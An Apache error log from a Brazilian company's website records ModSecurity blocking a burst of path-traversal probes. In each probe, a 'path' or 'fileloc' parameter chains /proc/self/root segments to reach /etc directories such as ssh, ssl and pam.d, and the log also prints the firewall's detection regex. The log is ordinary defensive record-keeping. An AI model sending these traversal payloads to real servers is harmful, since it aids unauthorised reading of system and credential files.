[Mon Mar 16 14:18:47.188189 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.241.46:41018] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7d6TCbgAP5jq5TegzsAAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:19:13.348077 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.241.46:49964] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7kaTCbgAP5jq5Tegz0AAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:14.707908 2026] [:error] [pid 15568:tid 140411674785536] [client 74.7.241.46:54688] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7kqQpVkWug9HeOt8-HwAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:17.000105 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.241.46:54702] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7k46lpbStxTqkSkt05wAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:18.459694 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.241.46:40836] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7lv9ocpUE4ed4uDz4bQAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:19.850550 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.241.46:40842] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7l7ABkC4fWIHEf8H3iQAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:21.759329 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.243.203:45252] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7mbABkC4fWIHEf8H3jAAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:19:22.325808 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.241.46:40854] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7mv9ocpUE4ed4uDz4bwAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:23.101387 2026] [:error] [pid 14895:tid 140411683178240] [client 74.7.243.203:42654] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7m1ajLEzk2WiQ-10awAAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:24.498375 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.243.203:42660] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7nI6lpbStxTqkSkt06AAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:26.800938 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.243.203:42674] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7nrysWC90G-1nBrBNDAAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:26.865380 2026] [:error] [pid 10651:tid 140411708356352] [client 74.7.241.46:40868] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7nrysWC90G-1nBrBNDQAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:29.562588 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.241.46:46292] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7oVajLEzk2WiQ-10axAAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:30.906222 2026] [:error] [pid 15061:tid 140411540502272] [client 74.7.241.46:46302] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7oqTCbgAP5jq5Tegz0wAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:32.098633 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:46312] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7pLysWC90G-1nBrBNDgAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:35.199339 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.243.203:42676] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7p9SswJuvopo3lOhnkAAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:19:35.919515 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.241.46:46320] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7p5qj1wV0Si-Okef3JAAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:39.022491 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.241.46:46334] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7qpqj1wV0Si-Okef3JgAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:39.023276 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.243.203:53834] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7q46lpbStxTqkSkt07QAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:19:40.342467 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:45686] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7rI6lpbStxTqkSkt07gAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:19:41.420853 2026] [:error] [pid 10651:tid 140411548894976] [client 74.7.243.203:35182] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7rbysWC90G-1nBrBNEQAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
